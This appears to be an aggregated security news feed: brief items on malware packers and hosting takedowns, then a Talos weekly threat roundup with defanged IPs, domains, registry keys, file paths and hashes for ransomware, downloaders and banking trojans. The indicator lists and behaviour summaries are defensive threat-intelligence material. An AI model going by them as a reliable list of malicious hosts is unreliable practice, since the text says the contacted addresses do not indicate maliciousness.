The Delphi packer is just the latest cybercriminal effort to prevent malware from being detected or reverse engineered. Attackers do this by concealing their payloads with code that’s not strictly malicious. In particular, packers use a technique called executable compression to make their files smaller. The Delphi packer adds on to this functionality by monitoring windows and mouse cursor movement for signs of a sandbox environment, in which case it puts itself into an infinite sleep.

Packers aren’t the only services that bad actors use to hide their malware. Malwarebytes noted that cybercriminals also turn to crypters, which use obfuscation or actual encryption to make their payloads undetectable, and protectors, which block reverse engineering attempts.

How to Protect Against Packed Malware

According to FireEye, security professionals can protect their organizations against packed malware by using sandbox environments that model real user behavior. The threat advisory on IBM X-Force Echange advises users to update their antivirus software and verify the legitimacy of any unsolicited email attachment. Finally, security personnel should analyze threat intelligence to learn about the latest packers that are available in dark web marketplaces.

Sources: FireEye, Malwarebytes

The post Threat Actors Use Delphi Packer to Shield Binaries From Malware Classification appeared first on Security Intelligence.

Most hosting providers take too long to remove malware distribution sites

How long does it take web hosting providers to remove malware distribution sites parked on their network? Roman Hussy, the Swiss security activist behind abuse.ch, says that, on average, it takes them 3 days, 2 hours, and 33 minutes. Some are much quicker than that and some much are much slower – the record is by an Australian ISP that took nearly 20 days – as there are many things that interfere with automated and … More

The post Most hosting providers take too long to remove malware distribution sites appeared first on Help Net Security.

Keeping your cloud malware-free: What you need to know

This year we’ve seen massive malware attacks spanning from nation state campaigns originating in North Korea and Russia to popular restaurants and everything in between. Each new incident serves as a grim reminder to business leaders that hackers will not relent. Yet with cloud adoption growing rapidly in the enterprise, the odds of a malware infection spreading and leading to a potential breach are increasing. According to a study conducted by the Ponemon Institute, almost … More

The post Keeping your cloud malware-free: What you need to know appeared first on Help Net Security.

Hackers illegally selling stolen Fortnite accounts & botnets on Instagram

By Waqas

It is not happening on Dark Web but Instagram. Instagram has become much more than a platform to share your traveling, culinary, or fitness-related experiences, but a thriving portal for selling stolen accounts. Reportedly, hackers are using Instagram to sell access to botnets as well as stolen user accounts from Spotify, Fortnite and other services. […]

This is a post from HackRead.com Read the original post: Hackers illegally selling stolen Fortnite accounts & botnets on Instagram

Threat Roundup Sept 28 – Oct 5

Today, as we do every week, Talos is giving you a glimpse into the most prevalent threats we’ve observed this week — covering the dates between Sept. 28 and Oct. 5. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, we will summarize the threats we’ve observed by highlighting key behavioral characteristics and indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

The most prevalent threats highlighted in this roundup are:

  • Win.Malware.Gandcrab-6706045-0
    Malware
    Gandcrab is ransomware that encrypts documents, photos, databases and other important files using the file extension ".GDCB", ".CRAB" or ".KRAB". Gandcrab is spread through both traditional spam campaigns, as well as multiple exploit kits, including Rig and Grandsoft.
     
  • Xls.Downloader.Valyria-6704496-0
    Downloader
    These variants of Valyria are malicious Excel files that contain embedded VBA macros used to distribute other malware.
     
  • Win.Dropper.Fqdq-6705253-0
    Dropper
    This dropper attempts to access the Firefox Password Manager local database, uses a temporary batch file to perform additional malicious activities and uploads files to remote servers. Additionally, it might inject code, read INI files or use Visual Basic scripts.
     
  • Win.Malware.Genkryptik-6704925-0
    Malware
    Win.Malware.Genkryptik is oftentimes a generic detection name for a Windows trojan. Some of the malicious activities that could be performed by these samples, without the user's knowledge, include: collecting system information, downloading and uploading files and dropping additional samples.
     
  • Win.Malware.Zusy-6704537-0
    Malware
    Zusy is a trojan that uses man-in-the-middle attacks to steal banking information. When executed, it injects itself into legitimate Windows processes such as "explorer.exe" and "winver.exe". The malware attempts to trick the user into entering their login information whenever they visit a financial services website.
     
  • Win.Malware.Razy-6703914-0
    Malware
    Razy is oftentimes a generic detection name for a Windows trojan. They collect sensitive information from the infected host and encrypt the data, and send it to a command and control (C2) server. Information collected might include screenshots. The samples modify auto-execute functionality by setting/creating a value in the registry for persistence.
     
  • Doc.Malware.Emooodldr-6699885-0
    Malware
    These malicious Word documents contain embedded VBA macros, spawn new processes, drops files and remove Office resiliency keys.
     

Threats

Win.Malware.Gandcrab-6706045-0


Indicators of Compromise


Registry Keys
  • <HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E
    • Value Name: LanguageList
  • <HKCU>\CONTROL PANEL\DESKTOP
    • Value Name: Wallpaper
Mutexes
  • Global\8B5BAAB9E36E4507C5F5.lock
  • Global\XlAKFoxSKGOfSGOoSFOOFNOLPE
  • Groove:PathMutex:tzanqCjN6dCs1QGzbKslin0UfIk=
IP Addresses contacted by malware. Does not indicate maliciousness.
  • 50[.]63[.]202[.]89
  • 93[.]125[.]99[.]121
  • 137[.]74[.]238[.]33
  • 94[.]231[.]109[.]239
  • 185[.]135[.]88[.]105
  • 146[.]66[.]72[.]87
  • 87[.]236[.]16[.]31
  • 217[.]160[.]0[.]234
  • 69[.]73[.]180[.]151
  • 104[.]31[.]77[.]95
  • 171[.]244[.]34[.]167
  • 217[.]174[.]149[.]130
  • 70[.]40[.]197[.]96
  • 223[.]26[.]62[.]72
  • 80[.]77[.]123[.]23
  • 178[.]238[.]37[.]162
  • 51[.]68[.]50[.]168
  • 104[.]28[.]30[.]160
  • 67[.]227[.]236[.]96
  • 66[.]96[.]147[.]67
  • 179[.]188[.]11[.]34
  • 89[.]252[.]187[.]72
  • 194[.]58[.]56[.]95
  • 104[.]28[.]28[.]142
  • 104[.]27[.]163[.]241
  • 213[.]186[.]33[.]186
  • 107[.]178[.]113[.]162
  • 87[.]236[.]16[.]29
  • 188[.]165[.]53[.]185
  • 173[.]247[.]242[.]133
  • 77[.]104[.]144[.]25
  • 191[.]252[.]51[.]37
  • 202[.]43[.]45[.]181
  • 192[.]163[.]234[.]40
  • 217[.]160[.]0[.]27
  • 209[.]182[.]208[.]245
  • 94[.]73[.]148[.]18
  • 45[.]33[.]91[.]79
  • 87[.]236[.]19[.]135
  • 52[.]29[.]192[.]136
  • 178[.]33[.]233[.]202
  • 92[.]53[.]96[.]201
  • 186[.]202[.]153[.]158
  • 104[.]24[.]104[.]13
  • 213[.]186[.]33[.]3
  • 188[.]64[.]184[.]90
  • 95[.]213[.]173[.]173
  • 103[.]107[.]17[.]102
  • 103[.]27[.]238[.]31
  • 50[.]87[.]58[.]165
  • 104[.]27[.]186[.]113
  • 104[.]24[.]102[.]153
  • 77[.]104[.]171[.]238
  • 194[.]154[.]192[.]67
  • 87[.]236[.]16[.]41
Domain Names contacted by malware. Does not indicate maliciousness.
  • www[.]litespeedtech[.]com
  • big-game-fishing-croatia[.]hr
  • www[.]lagouttedelixir[.]com
  • dreamhost[.]com
  • www[.]himmerlandgolf[.]dk
  • hanaglobalholding[.]com
  • top-22[.]ru
  • zaeba[.]co[.]uk
  • ispsystem[.]com
  • unnatimotors[.]in
  • www[.]macartegrise[.]eu
  • blokefeed[.]club
  • bellytobabyphotographyseattle[.]com
  • diadelorgasmo[.]cl
  • www[.]bgfc[.]hr
  • www[.]wash-wear[.]com
  • yourmine[.]ru
  • www[.]reg[.]ru
  • www[.]poketeg[.]com
  • boatshowradio[.]com
  • www[.]perfectfunnelblueprint[.]com
  • perovaphoto[.]ru
  • www[.]cakav[.]hu
  • www[.]billerimpex[.]com
  • evotech[.]lu
  • www[.]ismcrossconnect[.]com
  • help[.]dreamhost[.]com
  • www[.]fabbfoundation[.]gm
  • alem[.]be
  • cevent[.]net
  • mauricionacif[.]com
  • smbardoli[.]org
  • www[.]aco[.]dk
  • cyclevegas[.]com
  • lucides[.]co[.]uk
  • krasnaypolyana123[.]ru
  • hoteltravel2018[.]com
  • oceanlinen[.]com
  • 6chen[.]cn
  • koloritplus[.]ru
  • asl-company[.]ru
  • www[.]krishnagrp[.]com
  • test[.]theveeview[.]com
  • cdnjs[.]cloudflare[.]com
  • picusglancus[.]pl
  • bloghalm[.]eu
  • api[.]w[.]org
  • nesten[.]dk
  • simetribilisim[.]com
  • pp-panda74[.]ru
  • wpakademi[.]com
  • dna-cp[.]com
  • h5s[.]vn
  • bethel[.]com[.]ve
  • vjccons[.]com[.]vn
  • www[.]rment[.]in
  • marketisleri[.]com
  • www[.]byggekvalitet[.]dk
  • royal[.]by
  • gmpg[.]org
  • sherouk[.]com
  • tommarmores[.]com[.]br
  • graftedinn[.]us
  • www[.]mimid[.]cz
  • maxcdn[.]bootstrapcdn[.]com
  • panel[.]dreamhost[.]com
  • relectrica[.]com[.]mx
  • acbt[.]fr
  • damt7w3yoa0t2[.]cloudfront[.]net
  • topstockexpert[.]su
  • goodapd[.]website
  • www[.]n2plus[.]co[.]th
  • aurumwedding[.]ru
  • devdev[.]com[.]br
  • www[.]toflyaviacao[.]com[.]br
  • mimid[.]cz
  • nhs-foi[.]com
  • www[.]iyfipgun[.]com
  • wash-wear[.]com
Files and or directories created
  • %AppData%\Microsoft\Internet Explorer\UserData\MA3SBLRS\spid[1].xml
  • %UserProfile%\Videos\98b689db98b68e303c.lock
  • %UserProfile%\Start Menu\98b689db98b68e303c.lock
  • %UserProfile%\Start Menu\SGMNP-DECRYPT.txt
  • %UserProfile%\Videos\Sample Videos\98b689db98b68e303c.lock
  • %UserProfile%\Videos\Sample Videos\SGMNP-DECRYPT.txt
  • \??\E:\$RECYCLE.BIN\S-1-5-21-2580483871-590521980-3826313501-500\98b689db98b68e303c.lock
  • \??\E:\$RECYCLE.BIN\S-1-5-21-2580483871-590521980-3826313501-500\SGMNP-DECRYPT.txt
  • \??\E:\$RECYCLE.BIN\SGMNP-DECRYPT.txt
  • \??\E:\98b689db98b68e303c.lock
  • \??\E:\SGMNP-DECRYPT.txt
  • \MSOCache\SGMNP-DECRYPT.txt
  • \PerfLogs\Admin\SGMNP-DECRYPT.txt
  • \PerfLogs\SGMNP-DECRYPT.txt
  • \Recovery\926583e2-ef64-11e4-beed-d6738078ad98\SGMNP-DECRYPT.txt
  • \Recovery\SGMNP-DECRYPT.txt
  • \SGMNP-DECRYPT.txt
  • \TEMP\SGMNP-DECRYPT.txt
  • %UserProfile%\Videos\SGMNP-DECRYPT.txt
File Hashes
  • 211484d0deda5cb97b16b27538b7d1d2c26af6ae3aac3c888085a0e8ddf2d8bd
  • 46b702851cb5c1df0a97d1ae9e3202316d36ef2195395a9bcc3699dd1d247733
  • 4e2ba4638d01c1473f0959fae6d31636456cde0ab995fa5f3fad1efc2cb7bf0e
  • 69fd1808c32fe3209f384fba8f79df13bec479e9b081f7edcf8720f6257f7dfe
  • 8b5c1735800d8ad69b535a863f4ae1941604b3e57261961e230a26b16b4b98ec
  • 9ec54c9d6ec39c34c8e011fcb10fb2ae5334d1d0632e63a61d94b36b9f9c8a9b
  • c394e7fa3604f5ee26419a913dbfeb0988d59bbf8ed25d852ebf62a48cc1688a
  • c4a126172b27777413ee4efcd0ce8656fbef52e81c984993af3fa63d5264cc8e
  • d81aa5dbd9272f9be6e4a0def514a9284220d88f219ac6fd908ab2c942b92cdc
  • d9129786346cfa0aa07a1c82d4bcb79a977c7c8e1a052916a34b6cde4c09c006
  • e41697a99da83a32bf8a56f993123fbfaef378d5e6f61286a272536fe10b6d35
  • e50a28068fcae51a609946fad1637a5dbfbda8add88063ddb117cb8e0cfc4a74
  • e8502aa65a4da371c0e378b245374af7340b809140a5d2e3bc3bfa67a92a2bde
  • eb9347f0fbbb675ecc61beb1f2be8721871e203357b124ad9858037a641709f5
  • f77825b0388a6220521219030ad70bdb6fcd3216a590d092ec4aa22a506a17b6

Coverage


Screenshots of Detection

AMP



ThreatGrid


Umbrella


Xls.Downloader.Valyria-6704496-0


Indicators of Compromise


Registry Keys
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: UNCAsIntranet
  • <HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP
    • Value Name: AutoDetect
  • <HKCU>\SOFTWARE\MICROSOFT\WISP\MULTITOUCH
    • Value Name: MultiTouchEnabled
  • <HKCU>\SOFTWARE\MICROSOFT\WISP\PEN\PERSIST\0\1
    • Value Name: HidCursorName
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
    • Value Name: DeleteFlag
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND
    • Value Name: Start
Mutexes
  • Local\10MU_ACB10_S-1-5-5-0-57527
  • Local\10MU_ACBPIDS_S-1-5-5-0-57527
  • Global\316D1C7871E00
  • {773F1B9A-35B9-4E95-83A0-A210F2DE3B37}-Default
IP Addresses contacted by malware. Does not indicate maliciousness.
  • 78[.]47[.]139[.]102
  • 107[.]180[.]25[.]0
  • 103[.]110[.]91[.]118
  • 89[.]163[.]224[.]250
  • 199[.]249[.]223[.]62
  • 185[.]220[.]101[.]12
  • 89[.]27[.]96[.]42
  • 208[.]113[.]131[.]196
Domain Names contacted by malware. Does not indicate maliciousness.
  • dallasmediationlawyer[.]com
  • myexternalip[.]com
Files and or directories created
  • %LocalAppData%\Temp\character.exe
  • %AppData%\mssert\chasactes.exe
  • %LocalAppData%\Temp\const_cast.bat
  • %LocalAppData%\Temp\whzxixx5.jdj.ps1
  • %LocalAppData%\Temp\xgxfy2dc.eju.psm1
  • %LocalAppData%\Temp\21iyllij.ncz.psm1
  • %LocalAppData%\Temp\erifm5li.lo3.ps1
  • %LocalAppData%\Temp\wmez5d0g.r0g.ps1
  • %LocalAppData%\Temp\gs0jrz4i.yd2.psm1
  • %LocalAppData%\Temp\qgh0kqvv.ce5.ps1
  • %LocalAppData%\Temp\tkzdlipn.odo.psm1
File Hashes
  • 0276895b76757b5b2726c1c2fbb50d98040dc2dc46aedff1e5b9709f168b4a8d
  • 0f792637a859a3c2919e1e45a9500e1bdf2b5f4e07bfc4d8b5e24cf7c8003e5e
  • 1114fd2ee387df04c4e7ed0bb6d088b220e893c8a1ee07386977c7369681e5d3
  • 1c2f39f6a608c70b16a79ed4cfb228c412852caac8a8b8bafc4e0819d038aa2c
  • 2ca6d57dcfacd0f59f8b390ccbf138b557b8e95a157a53de6fe864c5eafbcf80
  • 4682a95f9ed32657ee61b7aec758ab6bbdc17a52e2812e1372b3b2a9776cadc1
  • 655f60c338658334723310c79033b26daa207b61fd89ebaf4abbed93802c65be
  • 672aac7a017a8417608dfe687fa4023fdd1e90a7d77f6e1d9b035a070c9d9c40
  • 6ff12e83f44e19de6515c03108fccfd98abd3a70bbab1088171954a3c6113d3b
  • a407d2cfb849a1822895fb5770db7c24b707422da3a193e7d8f5d9e39bfb3896
  • ccbac43307cd046f896283deac0341351b5dc83e6be5cb2292a0c28cdfd34650
  • dafd70b7b82551b0feb905f8d466d2b02784ce6e5d5c2b8d6d00e82b27487ae0
  • dbf3533e970aacc291d0342289943605537407df18217182ca39d52a8c9f8970

Coverage


Screenshots of Detection

AMP



ThreatGrid



Umbrella

Win.Dropper.Fqdq-6705253-0


Indicators of Compromise


Registry Keys
  • <HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E
    • Value Name: LanguageList
  • <HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION
    • Value Name: PnpInstanceID
Mutexes
  • 3749282D282E1E80C56CAE5A
IP Addresses contacted by malware. Does not indicate maliciousness.
  • N/A
Domain Names contacted by malware. Does not indicate maliciousness.
  • baxishop[.]ro
Files and or directories created
  • %AppData%\D282E1\1E80C5.lck
  • %AllUsersProfile%\Microsoft\Vault\AC658CB4-9126-49BD-B877-31EEDAB3F204\Policy.vpol
  • \PC*\MAILSLOT\NET\NETLOGON
  • \lsass
  • %AppData%\D282E1
  • \samr
File Hashes
  • 030290f026a913226735bc017a37997180f130b9ce1fdc3b990e050aea4bc39e
  • 07abd686b7cda16b61c65d82cb72f464e2ea31bb8bb165f01bbcfa693f1bd22a
  • 1258790e008879340d7cd8e6b303e25183345a05d81b6583164f0a690323405b
  • 12963b31f9719d9333f6cbdb46426c32179bba4a31976b094d192588eb4439ff
  • 2627bd09fd4886f83a7ca589518523606b581ad026968f3d013e1cfb221f7811
  • 2c18a46ea35314f065b21e151d37787cfa5b7696207226ca80f7732176659ee9
  • 30a901d40309ac1e42e98ad59044e1e1f97f985ca397628e8f0deb8f67f39d1f
  • 31ef4c98208464b43dd337b92cba0cfa05d0924ebc732e0b1ee88120495f503c
  • 34f159a5b3ee64cbe520c18e9abd66be61b583dad385bbec9cadf054942827da
  • 35c1410cfb084bb4f4ef5a7c3d92c7b78ddd33849864e41f22e09f5b1c3997b2
  • 3a69eddc3ab09e947703dbfd7e279e9e6e867190c9f72f395833fe94a1b6903a
  • 4688f04b2498695705ea718ba724e9f0c04d92d09d75505f7fa1b1ad19bfe795
  • 4e79a2473921ee6132c3e73f9b4de0395ec350cb476981cf2cb19171034f9405
  • 56979370107aeffca2fa5ad915f454e33ced1a5c6518dbc01ed15689b92e83dd
  • 582f2175b65814e7558fca9ebc7e1a6f97402ce3079f43ece47fdc17c3f7324e
  • 5f83ff3b7d094547fd00dacabe669e389bdd04af09dcbc7790f29a63f797a00f
  • 6448bc9787a96f76cc6716294a204df6d1cbd6db9cc441abc78b31161529e00f
  • 7a2868174590c11d2f95794260792700a1fd567b5315702decfd1cd6611ed0d5
  • 8b7a4bc0f2ea0f3e54b0cea9fa2928ddd0a85aa80a64071985cf95301c0d5ac3
  • 9030a6efd1e15d5e78b727700863ab45b667a7c532761b3a148aa222f7e17b87
  • 946de8d2685ded47c74e4b7c9490e8961598462a87be7ca5bef22693745f7cfa
  • 951860ee7f7283a3b238cbfdb6e161c09fcb6a2b7975bb142412c442fd2590fd
  • 95b99dd7dd7814724287c89e2435aa65cc82e91c5aabd453be1a0532d50bd936
  • 96397b26ba4ee4244704c2cadd71c3d3d4c12e988f6de1d695f3602432bd94b3
  • 9c5acd9297928707ed7e472e9316b125b55b2cd98870aaa4b4630dcd0fece734

Coverage


Screenshots of Detection

AMP



ThreatGrid

Win.Malware.Genkryptik-6704925-0


Indicators of Compromise


Registry Keys
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS
    • Value Name: DhcpNameServer
  • <HKLM>\SYSTEM\CONTROLSET001\SERVICES\TCPIP\PARAMETERS\INTERFACES\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}
    • Value Name: DhcpNameServer
Mutexes
  • !IECompat!Mutex
  • !PrivacIE!SharedMem!Mutex
  • Local\VERMGMTBlockListFileMutex
  • Local\!BrowserEmulation!SharedMemory!Mutex
  • Local\URLBLOCK_DOWNLOAD_MUTEX
  • Local\URLBLOCK_HASHFILESWITCH_MUTEX
  • {5312EE61-79E3-4A24-BFE1-132B85B23C3A}
  • {66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}
  • IsoScope_1e0_ConnHashTable<480>_HashTable_Mutex
  • IsoScope_1e0_IESQMMUTEX_0_303
  • IsoScope_1e0_IESQMMUTEX_0_331
  • IsoScope_1e0_IESQMMUTEX_0_274
  • Local\URLBLOCK_FILEMAPSWITCH_MUTEX_480
  • IsoScope_708_ConnHashTable<1800>_HashTable_Mutex
  • IsoScope_708_IESQMMUTEX_0_303
  • IsoScope_708_IESQMMUTEX_0_331
  • Local\URLBLOCK_FILEMAPSWITCH_MUTEX_1800
  • IsoScope_708_IESQMMUTEX_0_274
  • IsoScope_4b4_IESQMMUTEX_0_274
  • IsoScope_f8_IESQMMUTEX_0_274
  • IsoScope_20c_ConnHashTable<524>_HashTable_Mutex
  • IsoScope_20c_IESQMMUTEX_0_303
  • IsoScope_20c_IESQMMUTEX_0_331
  • IsoScope_4b4_ConnHashTable<1204>_HashTable_Mutex
  • IsoScope_4b4_IESQMMUTEX_0_303
  • IsoScope_4b4_IESQMMUTEX_0_331
  • IsoScope_20c_IESQMMUTEX_0_274
  • Local\URLBLOCK_FILEMAPSWITCH_MUTEX_524
  • IsoScope_f8_ConnHashTable<248>_HashTable_Mutex
  • IsoScope_f8_IESQMMUTEX_0_303
  • IsoScope_f8_IESQMMUTEX_0_331
  • Local\URLBLOCK_FILEMAPSWITCH_MUTEX_248
  • IsoScope_6e4_IESQMMUTEX_0_274
  • IsoScope_6e4_ConnHashTable<1764>_HashTable_Mutex
  • IsoScope_6e4_IESQMMUTEX_0_303
  • IsoScope_6e4_IESQMMUTEX_0_331
  • Local\URLBLOCK_FILEMAPSWITCH_MUTEX_1764
  • IsoScope_4e8_IESQMMUTEX_0_274
  • IsoScope_4e8_ConnHashTable<1256>_HashTable_Mutex
  • IsoScope_4e8_IESQMMUTEX_0_303
  • IsoScope_4e8_IESQMMUTEX_0_331
  • Local\URLBLOCK_FILEMAPSWITCH_MUTEX_1256
IP Addresses contacted by malware. Does not indicate maliciousness
  • 13[.]107[.]21[.]200
Domain Names contacted by malware. Does not indicate maliciousness
  • ryiwuehwskosuqhs[.]com
  • goldenmemb[.]website
  • dolikulooospo[.]fun
Files and or directories created
  • %LocalAppData%Low\Microsoft\Internet Explorer\Services\search_{0633EE93-D776-472f-A0FF-E1416B8B2E3A}.ico
  • %LocalAppData%\Microsoft\Windows\WebCache\V01tmp.log
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\dnserror[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\httpErrorPagesScripts[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\6YL4T24G\errorPageStrings[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\6YL4T24G\httpErrorPagesScripts[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\NewErrorPageTemplate[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\errorPageStrings[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\NewErrorPageTemplate[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\dnserror[1]
  • %LocalAppData%\Microsoft\Windows\WebCache\V010000F.log
  • %LocalAppData%\Temp\~DF4B1ABF6D6A9DC6E3.TMP
  • %LocalAppData%\Temp\~DF88BBAB8557CDD7E3.TMP
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\errorPageStrings[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\suggestions[2].en-US
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\6YL4T24G\NewErrorPageTemplate[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\dnserror[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\favicon[2].ico
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\favicon[1].png
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\favicon[2].png
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\6YL4T24G\views[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\favicon[1].ico
  • %LocalAppData%\Temp\~DFDEB0FC636A1346E9.TMP
  • %LocalAppData%\Temp\~DFEBFBFB87C6F7EC1B.TMP
  • %LocalAppData%\Temp\~DFFC172A87F8554CB4.TMP
  • %LocalAppData%\Temp\~DF81A97BC70E347BD0.TMP
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\httpErrorPagesScripts[1]
  • %LocalAppData%\Temp\~DF8AA772D245BBB59D.TMP
  • %LocalAppData%\Temp\~DF90B11BDCE6092786.TMP
  • %LocalAppData%\Temp\~DF9FFAF3D7E7318657.TMP
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\1NSKV6K6\NewErrorPageTemplate[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\7V3XNPL2\httpErrorPagesScripts[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\NewErrorPageTemplate[2]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\dnserror[2]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\errorPageStrings[1]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\errorPageStrings[2]
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\SSZWDDXW\httpErrorPagesScripts[2]
  • %LocalAppData%\Temp\~DF5DDD3B43947F7CEA.TMP
  • %LocalAppData%\Microsoft\Windows\Temporary Internet Files\Content.IE5\6YL4T24G\dnserror[1]
  • %LocalAppData%\Temp\~DFB15BBE1A2AFF7D7E.TMP
  • %LocalAppData%\Temp\~DF1D30A03829232972.TMP
  • %LocalAppData%\Temp\~DF38E2C66D6383AD19.TMP
  • %LocalAppData%\Temp\~DFCE77235CFE7E5202.TMP
File Hashes
  • 060707050140235807d6e6ac6933fa26cf0c230d68f574b880e99a699bdf506a
  • 088a6e8da14dbeab941702b1515b85486544dffc83885112b95997257f8d32d5
  • 0dfc771e0fbdf05facc54643341dfce97b745efe13867b01049bc977624d14b2
  • 0e21eb1c5f15689329bc6d46d78eb7d0f4eccc6fb8da4f41d17e6205ae7a847b
  • 0f71ba5f0fbba5d9810a4f816c5ebe1d545c4c65b34c180c769c2cd3467b0737
  • 130649d3f09197d1c2e895cc06fd9ecd6feb2e663562a6b99d95ae4ce66eddb8
  • 139ac3f5d2e5351c0edcd0edb384d0a75e482e8007724f181c7a4204f5895ad9
  • 13c3313b910f18431ea183b00632deacd266561a73bcf837f4b46f1f73b31bcd
  • 24b6c693551ed33b55d7ce6baae96dcca9e3cb55e9b94637d5ba59edc109d402
  • 27cec90ae8c84a79dd2ebb2928152bdea1b07cab3b2f1ad98ed8fb3f17cc339b
  • 28b54e5cf1be89766c177bc7f4c8692abec0bb4bdf299a59709d10120f7bc205
  • 29b845365404070e98840dcd74eb3c23919b0990b14bd0905b0921220f8b4bb9
  • 2c3fad4307c0739c336e50ec670b61d00029d2a2be260676419f883835ce8818
  • 337ad107eb3e1fc497af4b3f6006e12ae74a55d6535f28a67c9b231807e15f24
  • 3394d5ec6ba4c548289008cbfea8238318af52d51e8e2110b5060635425db74c
  • 378a4e27208c7fee9c7ac33d11d8872db902fe5242aceabba11343bf11a95155
  • 3a136b2b6df645c3e6b3c0febb821a5dda5bcb4bd35f674fb33aa10684b58004
  • 3c4e171d1f0b29b6f40f8bdf6af0c1161b092591c453c66734f4c6f54a0ac36f
  • 3ec415b8f411c2004892c7dedcd25e4683d0f0fded754c8b9a0f784f087dddcf
  • 420c05993a014331992918e89dda914851c0e31a2e196446309e3da07dc0c31a
  • 43d9e51c98400b09bc499f0e2857e2b797254167c29c9d2234f6506d7cf7f98e
  • 4ae9179659e2ba267b87478ea0f48c6c1caba252b4d2bcdfdc4b6ba873028d87
  • 542b5b23123a0a71d79181adeda4edfff6b91cdaf0068aafc55ee03bdc928ab5
  • 5bbc6d14ed5d408d0c7bb115853dff092c236517223c14b92c709a7ffa2c5742
  • 5cc63a68be8b7ea9feca940e7b038ebca417f421a0b70c17d3e6ebfca4212e16

Coverage


Screenshots of Detection

AMP



ThreatGrid



Umbrella

Win.Malware.Zusy-6704537-0


Indicators of Compromise


Registry Keys
  • <HKCR>\LOCAL SETTINGS\MUICACHE\3E\52C64B7E
    • Value Name: LanguageList
  • <HKLM>\System\CurrentControlSet\Services\Tcpip\Parameters
  • <HKLM>\SYSTEM\CONTROLSET001\CONTROL\NETWORK\{4D36E972-E325-11CE-BFC1-08002BE10318}\{9EB90D23-C5F9-4104-85A8-47DD7F6C4070}\CONNECTION
    • Value Name: PnpInstanceID
  • <HKCU>\Software\Microsoft\RAS AutoDial
Mutexes
  • DBWinMutex
  • NtHack
IP Addresses contacted by malware. Does not indicate maliciousness
  • 139[.]196[.]204[.]190
Domain Names contacted by malware. Does not indicate maliciousness
  • www[.]bilibili[.]com
  • wpa[.]qq[.]com
  • bbs[.]nt47[.]com
  • www[.]nt47[.]com
Files and or directories created
  • N/A
File Hashes
  • 00b657fa1270930f868fcd06c38af4b1514baa727c0db576e50340cc2f1c49dc
  • 0f6f850198e9afb8ddfe5552dad5ae6151c3cdf41f5ed8964a1e46ce62ea0d2b
  • 1bf8402a3da8797a130c528ff38fcca42403a5e878943d8dbaec420433c55edf
  • 2c0996f013b00833a28d1612acc545a66264b613e7127738ccf3536ddb04501c
  • 41cd6b708c56e1bad9b185ab09de02efd1f57d7c6691a9910d00b18489e59ec7
  • 4733b5c290c00ca10bc72c248d6a014c6bf5fe21b92592b941cfdd8ac6870610
  • 55099d0d5b7f5f677e431ebaf4c9a71877ab7b10887cb027ac78540ba1631779
  • 680e98f78b16e05b2f55e1432f8553341cfd02ece47cedca652a04e1f4c901cf
  • 6f496ef1284e79d93693374672e416d46b55c6590f8ab7737303b12f7316c2dd
  • 9085e78cbbf63b30c42a4801cee1b67fa41f4c4308d0f163c3d39d7f76c00bf8
  • 98e0df2e9cf8ba02d05cdc1bdea0cccc861855197f2a009f4a8fed152770b499
  • c19b9d8770e3619d832401aa7bc385bbf7e239d0397febbb441621efbb539f72
